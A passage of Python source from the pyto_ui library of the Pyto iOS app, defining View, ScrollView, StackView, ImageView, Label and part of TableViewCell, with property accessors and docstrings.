if callable(value) and "__self__" in dir(value) and value.__self__ == self:
d[name] = "self."+value.__name__
except AttributeError:
continue
return d
def _setup_subclass(self):
if callable(self.layout):
self.__py_view__.layoutAction = _values.value(self.layout)
if callable(self.did_appear):
self.__py_view__.appearAction = _values.value(self.did_appear)
if callable(self.did_disappear):
self.__py_view__.disappearAction = _values.value(self.did_disappear)
def __init__(self):
self.__py_view__ = __PyView__.newView()
self._setup_subclass()
def __repr__(self):
return "<"+self.__class__.__module__+"."+self.__class__.__name__+" "+str(self.__py_view__.managed.description)+">"
def __getitem__(self, item):
return self.subview_with_name(item)
def __del__(self):
try:
if self.__py_view__.references == 1:
_gc.collected.append(self.__py_view__)
elif self.__py_view__ not in _gc.collected:
self.__py_view__.releaseReference()
self.__py_view__.release()
except (AttributeError, ValueError):
pass
def __setattr__(self, name, value):
if name == "__py_view__":
previous = self.__py_view__
if previous is not None and previous.references == 1:
previous.releaseReference()
previous.release()
elif previous is not None:
if previous not in _gc.collected:
_gc.collected.append(previous)
if value is not None:
value.retainReference()
if isinstance(self, TableView) or isinstance(self, StackView):
value.retain()
super().__setattr__(name, value)
@property
def title(self) -> str:
"""
If this view is directly presented, the top bar will show this view's title.
:rtype: str
"""
title = self.__py_view__.title
if title is None:
return title
else:
return str(title)
@title.setter
def title(self, new_value: str):
self.__py_view__.title = new_value
@property
def name(self) -> str:
"""
The name identifying the view. To access a subview with its name, you can use the :func:`~pyto_ui.View.subview_with_name` function. :class:`~pyto_ui.View` is also subscriptable, so you can do something like that:
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
button = ui.Button()
button.name = "Button"
view = ui.View()
view.add_subview(button)
view["Button"] # -> Button object
:rtype: str
"""
name = self.__py_view__.name
if name is None:
return name
else:
return str(name)
@name.setter
def name(self, new_value: str):
self.__py_view__.name = new_value
def close(self):
"""
Closes the view, if the receiver object is the root view presented to the user.
"""
self.__py_view__.close()
def push(self, view: View):
"""
Presents the given additional view on top of the receiver.
:param view: The view to present.
"""
self.__py_view__.pushView(view.__py_view__)
def pop(self):
"""
Pops the visible view controller from the navigation controller.
"""
self.__py_view__.pop()
@property
def navigation_bar_hidden(self) -> bool:
"""
A boolean indicating whether the Navigation Bar of the View should be hidden.
:rtype: bool
"""
return self.__py_view__.navigationBarHidden
@navigation_bar_hidden.setter
def navigation_bar_hidden(self, new_value: bool):
self.__py_view__.navigationBarHidden = new_value
@property
def x(self) -> float:
"""
The x-coordinate of the view.
:rtype: float
"""
return self.__py_view__.x
@x.setter
def x(self, new_value: float):
self.__py_view__.x = new_value
@property
def y(self) -> float:
"""
The y-coordinate of the point.
:rtype: float
"""
return self.__py_view__.y
@y.setter
def y(self, new_value: float):
self.__py_view__.y = new_value
@property
def width(self) -> float:
"""
The width of the view.
:rtype: float
"""
return self.__py_view__.width
@width.setter
def width(self, new_value: float):
self.__py_view__.width = new_value
@property
def height(self) -> float:
"""
The height of the view.
:rtype: float
"""
return self.__py_view__.height
@height.setter
def height(self, new_value: float):
self.__py_view__.height = new_value
@property
def center_x(self) -> float:
"""
The center x-coordinate of the view's frame rectangle. Setting this value updates ``frame`` property appropiately.
:rtype: float
"""
return self.__py_view__.centerX
@center_x.setter
def center_x(self, new_value: float):
self.__py_view__.centerX = new_value
@property
def center_y(self) -> float:
"""
The center y-coordinate of the view's frame rectangle. Setting this value updates ``frame`` property appropiately.
:rtype: float
"""
return self.__py_view__.centerY
@center_y.setter
def center_y(self, new_value: float):
self.__py_view__.centerY = new_value
@property
def center(self) -> Tuple[float, float]:
"""
The center point of the view's frame rectangle. Setting this value updates ``frame`` property appropiately.
This value is a tuple with X and Y coordinates.
:rtype: Tuple[float, float]
"""
return (self.center_x, self.center_y)
@center.setter
def center(self, new_value: Tuple[float, float]):
self.center_x, self.center_y = new_value
@property
def size(self) -> Tuple[float, float]:
"""
A size that specifies the height and width of the rectangle.
This value is a tuple with height and width values.
:rtype: Tuple[float, float]
"""
return (self.width, self.height)
@size.setter
def size(self, new_value: Tuple[float, float]):
self.width, self.height = new_value
@property
def origin(self) -> Tuple[float, float]:
"""
A point that specifies the coordinates of the view's rectangle’s origin.
This value is a tuple with X and Y coordinates.
:rtype: Tuple[float, float]
"""
return (self.x, self.y)
@origin.setter
def origin(self, new_value: Tuple[float, float]):
self.x, self.y = new_value
@property
def frame(self) -> Tuple[float, float, float, float]:
"""
The frame rectangle, which describes the view’s location and size in its superview’s coordinate system.
This value is a tuple with X, Y, Width and Height values.
:rtype: Tuple[float, float, float, float]
"""
return (self.x, self.y, self.width, self.height)
@frame.setter
def frame(self, new_value: Tuple[float, float, float, float]):
self.x, self.y, self.width, self.height = new_value
@property
def __flexible_width__(self) -> bool:
return self.__py_view__.flexibleWidth
@__flexible_width__.setter
def __flexible_width__(self, new_value: bool):
self.__py_view__.flexibleWidth = new_value
@property
def __flexible_height__(self) -> bool:
return self.__py_view__.flexibleHeight
@__flexible_height__.setter
def __flexible_height__(self, new_value: bool):
self.__py_view__.flexibleHeight = new_value
@property
def __flexible_left_margin__(self) -> bool:
return self.__py_view__.flexibleLeftMargin
@__flexible_left_margin__.setter
def __flexible_left_margin__(self, new_value: bool):
self.__py_view__.flexibleLeftMargin = new_value
@property
def __flexible_right_margin__(self) -> bool:
return self.__py_view__.flexibleRightMargin
@__flexible_right_margin__.setter
def __flexible_right_margin__(self, new_value: bool):
self.__py_view__.flexibleRightMargin = new_value
@property
def __flexible_top_margin__(self) -> bool:
return self.__py_view__.flexibleTopMargin
@__flexible_top_margin__.setter
def __flexible_top_margin__(self, new_value: bool):
self.__py_view__.flexibleTopMargin = new_value
@property
def __flexible_bottom_margin__(self) -> bool:
return self.__py_view__.flexibleBottomMargin
@__flexible_bottom_margin__.setter
def __flexible_bottom_margin__(self, new_value: bool):
self.__py_view__.flexibleBottomMargin = new_value
@property
def flex(self) -> List[AUTO_RESIZING]:
"""
A list that determines how the receiver resizes itself when its superview’s bounds change. See `Auto Resizing <constants.html#auto-resizing>`_ constants for possible values.
:rtype: List[`Auto Resizing <constants.html#auto-resizing>`_]
"""
a = []
if self.__flexible_width__:
a.append(FLEXIBLE_WIDTH)
if self.__flexible_height__:
a.append(FLEXIBLE_HEIGHT)
if self.__flexible_bottom_margin__:
a.append(FLEXIBLE_BOTTOM_MARGIN)
if self.__flexible_top_margin__:
a.append(FLEXIBLE_TOP_MARGIN)
if self.__flexible_left_margin__:
a.append(FLEXIBLE_LEFT_MARGIN)
if self.__flexible_right_margin__:
a.append(FLEXIBLE_RIGHT_MARGIN)
return a
@flex.setter
def flex(self, new_value: List[AUTO_RESIZING]):
(
self.__flexible_width__,
self.__flexible_height__,
self.__flexible_top_margin__,
self.__flexible_bottom_margin__,
self.__flexible_left_margin__,
self.__flexible_right_margin__,
) = (
(FLEXIBLE_WIDTH in new_value),
(FLEXIBLE_HEIGHT in new_value),
(FLEXIBLE_TOP_MARGIN in new_value),
(FLEXIBLE_BOTTOM_MARGIN in new_value),
(FLEXIBLE_LEFT_MARGIN in new_value),
(FLEXIBLE_RIGHT_MARGIN in new_value),
)
def subview_with_name(self, name) -> View:
"""
Returns the subview with the given name. This function search through all of the subviews recursively.
Raises ``NameError`` if no view is found.
:rtype: View
"""
def search_in_view(subview):
for view in subview.subviews:
if view.name == name:
return view
for view in subview.subviews:
return search_in_view(view)
view = search_in_view(self)
if view is not None:
return view
raise NameError(f"No subview named '{name}'")
@property
def subviews(self) -> List[View]:
"""
(Read Only) A list of the view's children.
See also :func:`~pyto_ui.View.add_subview`.
:rtype: List[View]
"""
views = self.__py_view__.subviews
if views is None or len(views) == 0:
return []
else:
_views = []
for view in views:
try:
ui = sys.modules["pyto_ui"]
except KeyError:
import pyto_ui as ui
_class = getattr(ui, str(view.objc_class.pythonName))
_view = _class()
_view.__py_view__ = view
_views.append(_view)
return _views
@property
def superview(self) -> View:
"""
(Read Only) The parent view containg the receiver view.
:rtype: View
"""
superview = self.__py_view__.superView
if superview is None:
return None
else:
try:
ui = sys.modules["pyto_ui"]
except KeyError:
import pyto_ui as ui
_class = getattr(ui, str(superview.objc_class.pythonName))
view = _class()
view.__py_view__ = superview
return view
@property
def background_color(self) -> Color:
"""
The background color of the view.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.backgroundColor
if c is None:
return None
else:
return Color(c)
@background_color.setter
def background_color(self, new_value: Color):
if new_value is None:
self.__py_view__.backgroundColor = None
else:
self.__py_view__.backgroundColor = new_value.__py_color__
@property
def hidden(self) -> bool:
"""
A boolean indicating whether the view is visible or not.
:rtype: bool
"""
return self.__py_view__.hidden
@hidden.setter
def hidden(self, new_value: bool):
self.__py_view__.hidden = new_value
@property
def alpha(self) -> float:
"""
The opacity of the view.
:rtype: float
"""
return self.__py_view__.alpha
@alpha.setter
def alpha(self, new_value: float):
self.__py_view__.alpha = new_value
@property
def opaque(self) -> bool:
"""
A boolean indicating whether the view is opaque or not. Setting to ``True`` should prevent the view from having a transparent background.
:rtype: bool
"""
return self.__py_view__.opaque
@opaque.setter
def opaque(self, new_value: bool):
self.__py_view__.opaque = new_value
_set_tint_color = False
@property
def tint_color(self) -> Color:
"""
The tint color of the view. If set to ``None``, the tint color will be inherited from the superview. The tint color affects some views like ``Button`` for title color, ``TextView`` for cursor color, etc.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.tintColor
if c is None:
return None
else:
return Color(c)
@tint_color.setter
def tint_color(self, new_value: Color):
if new_value is None:
self.__py_view__.tintColor = None
self._set_tint_color = False
else:
self.__py_view__.tintColor = new_value.__py_color__
self._set_tint_color = True
@property
def user_interaction_enabled(self) -> bool:
"""
A boolean indicating whether the view responds to touches.
:rtype: bool
"""
return self.__py_view__.userInteractionEnabled
@user_interaction_enabled.setter
def user_interaction_enabled(self, new_value: bool):
self.__py_view__.userInteractionEnabled = new_value
@property
def clips_to_bounds(self) -> bool:
"""
A boolean value that determines whether subviews are confined to the bounds of the view.
:rtype: bool
"""
return self.__py_view__.clipsToBounds
@clips_to_bounds.setter
def clips_to_bounds(self, new_value: bool):
self.__py_view__.clipsToBounds = new_value
@property
def corner_radius(self) -> float:
"""
The radius to use when drawing rounded corners for the view’s background.
:rtype: float
"""
return self.__py_view__.cornerRadius
@corner_radius.setter
def corner_radius(self, new_value: float):
self.__py_view__.cornerRadius = new_value
@property
def border_width(self) -> float:
"""
The width of the view's border.
:rtype: float
"""
return self.__py_view__.borderWidth
@border_width.setter
def border_width(self, new_value: float):
self.__py_view__.borderWidth = new_value
@property
def border_color(self) -> Color:
"""
The color of the view's border
:rtype: pyto_ui.Color
"""
c = self.__py_view__.borderColor
if c is None:
return None
else:
return Color(c)
@border_color.setter
def border_color(self, new_value: Color):
if new_value is None:
self.__py_view__.borderColor = None
else:
self.__py_view__.borderColor = new_value.__py_color__
@property
def content_mode(self) -> CONTENT_MODE:
"""
A flag used to determine how a view lays out its content when its bounds change.
See `Content Mode` <constants.html#content-mode>`_ constants for possible values.
:rtype: `Content Mode` <constants.html#content-mode>`_
"""
return self.__py_view__.contentMode
@content_mode.setter
def content_mode(self, new_value: CONTENT_MODE):
self.__py_view__.contentMode = new_value
@property
def appearance(self) -> APPEARANCE:
"""
The appearance of the view.
See `Appearance <constants.html#appearance>`_ constants for possible values.
:rtype: `Appearance <constants.html#appearance>`_
"""
return self.__py_view__.appearance
_set_appearance = False
@appearance.setter
def appearance(self, new_value: APPEARANCE):
self._set_appearance = (new_value != APPEARANCE_UNSPECIFIED)
self.__py_view__.appearance = new_value
@property
def first_responder(self) -> bool:
"""
(Read Only) A boolean indicating the view is first responder.
``UIKit`` dispatches some types of events, such as motion events, to the first responder initially.
:rtype: bool
"""
return self.__py_view__.firstResponder
def add_subview(self, view: View):
"""
Adds the given view to the receiver's hierarchy.
:param view: The view to add.
"""
self.__py_view__.addSubview(view.__py_view__)
def insert_subview(self, view: View, index: int):
"""
Inserts the given view to the receiver's hierarchy at the given index.
:param view: The view to insert.
:param index: The index where the view should be inserted.
"""
self.__py_view__.insertSubview(view.__py_view__, at=index)
def insert_subview_below(self, view: View, below_view: View):
"""
Inserts the given view to the receiver's hierarchy bellow another given view.
:param view: The view to insert.
:param below_view: The view above the inserted view.
"""
self.__py_view__.insertSubview(view.__py_view__, below=below_view.__py_view__)
def insert_subview_above(self, view: View, above_view: View):
"""
Inserts the given view to the receiver's hierarchy above another given view.
:param view: The view to insert.
:param above_view: The view below the inserted view.
"""
self.__py_view__.insertSubview(view.__py_view__, above=above_view.__py_view__)
def remove_from_superview(self):
"""
Removes the view from the parent's hierarchy.
"""
self.__py_view__.removeFromSuperview()
def add_gesture_recognizer(self, gesture_recognizer: GestureRecognizer):
"""
Adds a gesture recognizer.
:param gesture_recognizer: The gesture recognizer to be added.
"""
self.__py_view__.addGestureRecognizer(gesture_recognizer.__py_gesture__)
def remove_gesture_recognizer(self, gesture_recognizer: GestureRecognizer):
"""
Removes a gesture recognizer.
:param gesture_recognizer: The gesture recognizer to be removed.
"""
self.__py_view__.removeGestureRecognizer(gesture_recognizer.__py_gesture__)
@property
def gesture_recognizers(self) -> List[GestureRecognizer]:
"""
(Read Only) Returns all gesture recognizers.
See :meth:`~pyto_ui.View.add_gesture_recognizer`.
:rtype: List[GestureRecognizer]
"""
recognizers = self.__py_view__.gestureRecognizers
if recognizers is None or len(recognizers) == 0:
return []
else:
_recognizers = []
for recognizer in recognizers:
_recognizer = GestureRecognizer(GESTURE_TYPE_TAP)
_recognizer.__py_gesture__ = recognizer
_recognizers.append(_recognizer)
return _recognizers
def size_to_fit(self):
"""
Sizes the view to fit its content.
"""
self.__py_view__.sizeToFit()
def become_first_responder(self) -> bool:
"""
Becomes the first responder. On :class:`~pyto_ui.TextView` and :class:`~pyto_ui.TextField` objects, the keyboard will be shown.
Returns a boolean indicating the success.
:rtype: bool
"""
return self.__py_view__.becomeFirstResponder()
def resign_first_responder(self) -> bool:
"""
Stops being the first responder. On :class:`~pyto_ui.TextView` and :class:`~pyto_ui.TextField` objects, the keyboard will be hidden.
Returns a boolean indicating the success.
:rtype: bool
"""
return self.__py_view__.resignFirstResponder()
@property
def layout(self) -> Callable[[View], None]:
"""
A function called when the view is resized. Takes the view as parameter.
:rtype: Callable[[View], None]
"""
action = self.__py_view__.layoutAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@layout.setter
def layout(self, new_value: Callable[[View], None]):
self.__py_view__.pyValue = _values.value(self)
if new_value is None:
self.__py_view__.layoutAction = None
else:
self.__py_view__.layoutAction = _values.value(new_value)
@property
def did_appear(self) -> Callable[[View], None]:
"""
A function called when the view appears on screen. This function is called only if for the presented view and not its subviews.
:rtype: Callable[[View], None]
"""
action = self.__py_view__.appearAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_appear.setter
def did_appear(self, new_value: Callable[[View], None]):
self.__py_view__.pyValue = _values.value(self)
if new_value is None:
self.__py_view__.appearAction = None
else:
self.__py_view__.appearAction = _values.value(new_value)
@property
def did_disappear(self) -> Callable[[View], None]:
"""
A function called when the view stops being visible on screen. This function is called only if for the presented view and not its subviews.
:rtype: Callable[[View], None]
"""
action = self.__py_view__.disappearAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_disappear.setter
def did_disappear(self, new_value: Callable[[View], None]):
self.__py_view__.pyValue = _values.value(self)
if new_value is None:
self.__py_view__.disappearAction = None
else:
self.__py_view__.disappearAction = _values.value(new_value)
@property
def button_items(self) -> List[ButtonItem]:
"""
A list of :class:`~pyto_ui.ButtonItem` objects to be displayed on the top bar. Works only if the view is the root view presented with :func:`~pyto_ui.show_view` or :meth:`~pyto_ui.View.push`.
:rtype: List[ButtonItem]
"""
items = self.__py_view__.buttonItems
if items is None or len(items) == 0:
return []
else:
_items = []
for item in items:
_item = ButtonItem()
_item.managed = item
_items.append(_item)
return _items
@button_items.setter
def button_items(self, new_value: List[ButtonItem]):
items = []
if new_value is not None and len(new_value) > 0:
for item in new_value:
items.append(item.__py_item__)
self.__py_view__.buttonItems = items
class UIKitView(View):
"""
This class is used to create a PytoUI view from an UIKit view. This class must be subclassed and implement :meth:`~pyto_ui.UIKitView.make_view`.
"""
def __init__(self):
if type(self) is UIKitView:
msg = "'UIKitView' must be subclassed and implement 'make_view()'."
raise NotImplementedError(msg)
self._made_view = False
self._make_view()
while self.__py_view__ is None:
continue
def make_view(self) -> "UIView":
"""
Implement this method to return an UIKit View. This method is automatically called on the main thread.
:rtype: UIView
"""
return None
@mainthread
def _make_view(self):
view = self.make_view()
py_view = __PyUIKitView__.alloc().initWithManaged(view)
self.__py_view__ = py_view
self._setup_subclass()
class ScrollView(View):
"""
A view that allows the scrolling of its contained views.
"""
_content_view = None
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
try:
dictionary = dictionary["ScrollView"]
except KeyError:
return
content = get("content")
if content is not None:
self.content_width = get("width", content)
self.content_height = get("height", content)
view = get("view", content)
if view is not None:
if isinstance(view, View):
view = view.dictionary_representation()
self.content_view._parent = self
self.content_view.configure_from_dictionary(view)
self.horizontal = get("horizontal", default=False)
self.vertical = get("vertical", default=False)
def dictionary_representation(self):
d = super().dictionary_representation()
scroll_view = {
"content": {
"width": self.content_width,
"height": self.content_height,
"view": self.content_view.dictionary_representation()
},
"vertical": self.vertical,
"horizontal": self.horizontal
}
d["ScrollView"] = scroll_view
return d
@property
def content_width(self) -> float:
"""
The horizontal size of the content. The value is used to calculate when the scroll view should stop scrolling horizontally.
The default value is ``None``, which means the content width will be equal to the width size of the Scroll View.
:rtype: float
"""
return self.__py_view__.contentWidth
@content_width.setter
def content_width(self, new_value: float):
self.__py_view__.contentWidth = new_value
@property
def content_height(self) -> float:
"""
The vertical size of the content. The value is used to calculate when the scroll view should stop scrolling vertically.
The default value is ``None``, which means the content height will be equal to the height size of the Scroll View.
:rtype: float
"""
return self.__py_view__.contentHeight
@content_height.setter
def content_height(self, new_value: float):
self.__py_view__.contentHeight = new_value
@property
def vertical(self) -> bool:
"""
A boolean indicating whether the user can scroll vertically.
The default value is ``False``.
:rtype: bool
"""
return self.__py_view__.vertical
@vertical.setter
def vertical(self, new_value: bool):
self.__py_view__.vertical = new_value
@property
def horizontal(self) -> bool:
"""
A boolean indicating whether the user can scroll horizontally.
The default value is ``True``.
:rtype: bool
"""
return self.__py_view__.horizontal
@horizontal.setter
def horizontal(self, new_value: bool):
self.__py_view__.horizontal = new_value
@property
def content_view(self) -> View:
"""
(Read Only) This view is the content of the Scroll View.
You should add subviewss there instead of adding them directy to the Scroll View.
"""
if self._content_view is not None:
return self._content_view
else:
view = View()
view.__py_view__ = self.__py_view__.content
self._content_view = view
return view
def __init__(self):
self.__py_view__ = __PyScrollView__.newView()
self._setup_subclass()
def add_subview(self, view):
super().add_subview(view)
msg = "Adding a subview to a ScrollView doesn't add it to the scrollable area. See 'ScrollView.content_view'."
warnings.warn(msg, UserWarning)
class _StackSpacerView(View):
def __init__(self):
self.__py_view__ = __PyStackSpacerView__.newView()
self._setup_subclass()
class StackView(View):
"""
A view that arranges its children in a horizontal or vertical line.
This is a base class for :class:`~pyto_ui.HorizontalStackView` and :class:`~pyto_ui.VerticalStackView`. You should use one of them instead of :class:`~pyto_ui.StackView`.
"""
def __init__(self):
raise NotImplementedError("Cannot initialize a 'StackView'. Use 'HorizontalStackView' or 'VerticalStackView'.")
#def __del__(self):
# for view in self.subviews:
# view.remove_from_superview()
# super().__del__()
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["StackView"]
except KeyError:
return
if "padding" in dictionary and dictionary["padding"] is not None:
padding = dictionary["padding"]
self.padding = Padding(padding[0], padding[1], padding[2], padding[3])
def dictionary_representation(self):
d = super().dictionary_representation()
stack_view = {
"padding": [self.padding.top, self.padding.bottom, self.padding.left, self.padding.right]
}
d["StackView"] = stack_view
return d
def add_spacer(self):
"""
Adds a flexible space.
"""
self.add_subview(_StackSpacerView())
def insert_spacer(self, index: int):
"""
Inserts a flexible space at the given index.
:param index: The index where the view should be inserted.
"""
self.insert_subview(_StackSpacerView(), index)
def insert_spacer_before(self, before_view):
"""
Inserts a flexible space at the given index.
:param before_view: The view placed after the spacer.
"""
self.insert_subview_below(_StackSpacerView(), before_view)
def insert_spacer_after(self, after_view):
"""
Inserts a flexible space at the given index.
:param after_view: The view placed before the spacer.
"""
self.insert_subview_below(_StackSpacerView(), after_view)
@property
def padding(self) -> Padding:
"""
The padding of the view.
The default value is (0, 0, 0, 0).
:rtype: Padding
"""
padding = self.__py_view__.padding
return Padding(padding[0], padding[1], padding[2], padding[3])
@padding.setter
def padding(self, new_value: Padding):
self.__py_view__.padding = [new_value.top, new_value.bottom, new_value.left, new_value.right]
class HorizontalStackView(StackView):
"""
A view that arranges its children in a horizontal line.
"""
def __init__(self):
self.__py_view__ = __PyStackView__.horizontal()
self._setup_subclass()
class VerticalStackView(StackView):
"""
A view that arranges its children in a vertical line.
"""
def __init__(self):
self.__py_view__ = __PyStackView__.vertical()
self._setup_subclass()
class ImageView(View):
"""
A view displaying an image.
:param image: A PIL image.
:param symbol_name: An SF symbol name. See `sf_symbols <sf_symbols.html>`_
:param url: The URL of an image to load it remotely.
"""
def __init__(self, image: "Image" = None, symbol_name: str = None, url: str = None):
self.__py_view__ = __UIImageView__.newView()
self._setup_subclass()
self.image = image
self._symbol_name = None
self._url = None
if url is not None:
self.load_from_url(url)
self._url = url
elif symbol_name is not None:
self.image = image_with_system_name(symbol_name)
self._symbol_name = symbol_name
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["ImageView"]
except KeyError:
return
if "url" in dictionary and isinstance(dictionary["url"], str):
self.load_from_url(dictionary["url"])
elif "symbol" in dictionary and isinstance(dictionary["symbol"], str):
self.image = image_with_system_name(dictionary["symbol"])
elif "path" in dictionary and isinstance(dictionary["path"], str):
self.image = Image.open(dictionary["path"])
def dictionary_representation(self):
r = super().dictionary_representation()
image_view = {}
if self._url is not None:
image_view["url"] = self._url
elif self._symbol_name is not None:
image_view["symbol"] = self._symbol_name
elif self.image is not None and self.image.filename is not None:
image_view["path"] = self.image.filename
r["ImageView"] = image_view
return r
@property
def image(self) -> "Image":
"""
The image displayed on screen. Can be a ``PIL`` image or an ``UIKit`` ``UIImage``. See :func:`~pyto_ui.image_with_system_name` for more information about how to get a symbol image.
:rtype: Image.Image
"""
ui_image = self.__py_view__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
@image.setter
def image(self, new_value: "Image"):
if self.__py_view__.image is not None:
self.__py_view__.image.release()
if new_value is None:
self.__py_view__.image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_view__.image = new_value
else:
self.__py_view__.image = __ui_image_from_pil_image__(new_value)
def load_from_url(self, url):
"""
Loads and display the image at given url.
:param url: The URL of the image.
"""
def _set_image(self, url):
from PIL import Image
self.image = Image.open(urlopen(url))
Thread(target=_set_image, args=(self, url)).start()
class Label(View):
"""
A view displaying not editable and not selectable text.
"""
def __init__(self, text: str = ""):
self.__py_view__ = __PyLabel__.newView()
self._setup_subclass()
self.text = text
self._html = None
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["Label"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
self.text = get("text", default="")
html = get("html")
if html is not None:
self.load_html(html)
font = get("font")
if font is not None:
font_obj = Font.__new__(Font)
font_obj.configure_from_dictionary(font)
self.font = font_obj
alignment = get("alignment")
if alignment is not None:
name = "TEXT_ALIGNMENT_"+(alignment.upper())
self.text_alignment = globals()[name]
line_break_mode = get("line_break_mode")
if line_break_mode is not None:
name = "LINE_BREAK_MODE_"+(line_break_mode.upper())
self.line_break_mode = globals()[name]
self.number_of_lines = get("number_of_lines", default=1)
self.adjusts_font_size_to_fit_width = get("adjusts_font_size_to_fit_width", default=False)
def dictionary_representation(self):
r = super().dictionary_representation()
label = {}
label["text"] = self.text
if self._html is not None:
label["html"] = self._html
if self.text_color is not None:
label["color"] = self.text_color.dictionary_representation()
if self.font is not None:
label["font"] = self.font.dictionary_representation()
for key in list(globals().keys()).copy():
if key.startswith("TEXT_ALIGNMENT_") and globals()[key] == self.text_alignment:
label["alignment"] = key.split("TEXT_ALIGNMENT_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("LINE_BREAK_MODE_") and globals()[key] == self.line_break_mode:
label["line_break_mode"] = key.split("LINE_BREAK_MODE_")[1].lower()
label["adjusts_font_size_to_fit_width"] = self.adjusts_font_size_to_fit_width
label["number_of_lines"] = self.number_of_lines
r["Label"] = label
return r
def load_html(self, html):
"""
Loads HTML in the Label.
:param html: The HTML code to load.
"""
self._html = html
self.__py_view__.loadHTML(html)
@property
def text(self) -> str:
"""
The text to be displayed on the view.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def text_color(self) -> Color:
"""
The color of the text.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text.
:rtype: pyto_ui.Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The text's alignment. For possible values, see `Text Alignment <constants.html#text-alignment>`_ constants.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def line_break_mode(self) -> LINE_BREAK_MODE:
"""
The line break mode.
:rtype: `Line Break Mode <constants.html#line-break-mode>`_
"""
return self.__py_view__.lineBreakMode
@line_break_mode.setter
def line_break_mode(self, new_value: LINE_BREAK_MODE):
self.__py_view__.lineBreakMode = new_value
@property
def adjusts_font_size_to_fit_width(self) -> bool:
"""
A boolean indicating whether the label adjusts its font size to fit its size.
:rtype: bool
"""
return self.__py_view__.adjustsFontSizeToFitWidth
@adjusts_font_size_to_fit_width.setter
def adjusts_font_size_to_fit_width(self, new_value: bool):
self.__py_view__.adjustsFontSizeToFitWidth = new_value
@property
def allows_default_tightening_for_truncation(self) -> bool:
return self.__py_view__.allowsDefaultTighteningForTruncation
@allows_default_tightening_for_truncation.setter
def allows_default_tightening_for_truncation(self, new_value: bool):
self.__py_view__.allowsDefaultTighteningForTruncation = new_value
@property
def number_of_lines(self) -> int:
"""
The numbers of lines displayed in the label. Set to ``0`` to show all the text.
:rtype: int
"""
return self.__py_view__.numberOfLines
@number_of_lines.setter
def number_of_lines(self, new_value: int):
self.__py_view__.numberOfLines = new_value
class TableViewCell(View):
"""
A cell contained in a :class:`~pyto_ui.TableView`.
Can have a title, a subtitle, an image and an accessory view.
For a list of supported style, see `Table View Cell Style <constants.html#table-view-cell-style>`_ constants.
"""
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["TableViewCell"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
self.movable, self.removable = get("movable", default=False), get("removable", default=False)
if get("content") is not None:
content = get("content")
if isinstance(content, View):
content = content.dictionary_representation()
self.content_view.configure_from_dictionary(content)
if get("image") is not None and self.image_view is not None:
image = get("image")
if isinstance(image, View):
image = image.dictionary_representation()
self.image_view.configure_from_dictionary(image)
if get("label") is not None and self.text_label is not None:
label = get("label")
if isinstance(label, View):
label = label.dictionary_representation()
self.text_label.configure_from_dictionary(label)
if get("detail_label") is not None and self.detail_text_label is not None:
detail_label = get("detail_label")
if isinstance(detail_label, View):
detail_label = label.dictionary_representation()
self.detail_text_label.configure_from_dictionary(detail_label)
accessory_type = get("accessory_type")
if accessory_type is not None:
name = "ACCESSORY_TYPE_"+(accessory_type.upper())
self.accessory_type = globals()[name]
def dictionary_representation(self):
r = super().dictionary_representation()
table_view_cell = {
"movable": self.movable,
"removable": self.removable,
"content": self.content_view.dictionary_representation(),
}
if self.image_view is not None:
table_view_cell["image"] = self.image_view.dictionary_representation()
if self.text_label is not None:
table_view_cell["label"] = self.text_label.dictionary_representation()
if self.detail_text_label is not None:
table_view_cell["detail_label"] = self.detail_text_label.dictionary_representation()
for key in list(globals().keys()).copy():
if key.startswith("ACCESSORY_TYPE_") and globals()[key] == self.accessory_type:
table_view_cell["accessory_type"] = key.split("ACCESSORY_TYPE_")[1].lower()
r["TableViewCell"] = table_view_cell
return r
def __init__(
self, style: TABLE_VIEW_STYLE = __v__("TABLE_VIEW_CELL_STYLE_DEFAULT")
):
if style == "TABLE_VIEW_CELL_STYLE_DEFAULT":
self.__py_view__ = __PyTableViewCell__.newViewWithStyle(
TABLE_VIEW_CELL_STYLE_DEFAULT
)
else:
self.__py_view__ = __PyTableViewCell__.newViewWithStyle(style)
self.__py_view__.managedValue = _values.value(self)
self._setup_subclass()
@property
def movable(self) -> bool:
"""
A boolean indicating whether the cell is movable. If set to ``True``, the container :class:`TableViewSection` object should handle the move.
:rtype: bool
"""
return self.__py_view__.movable
@movable.setter
def movable(self, new_value: bool):
self.__py_view__.movable = new_value
@property
def removable(self) -> bool:
"""
A boolean indicating the cell is removable. If set to ``True``, the container :class:`TableViewSection` object should handle the removal.
:rtype: bool
"""
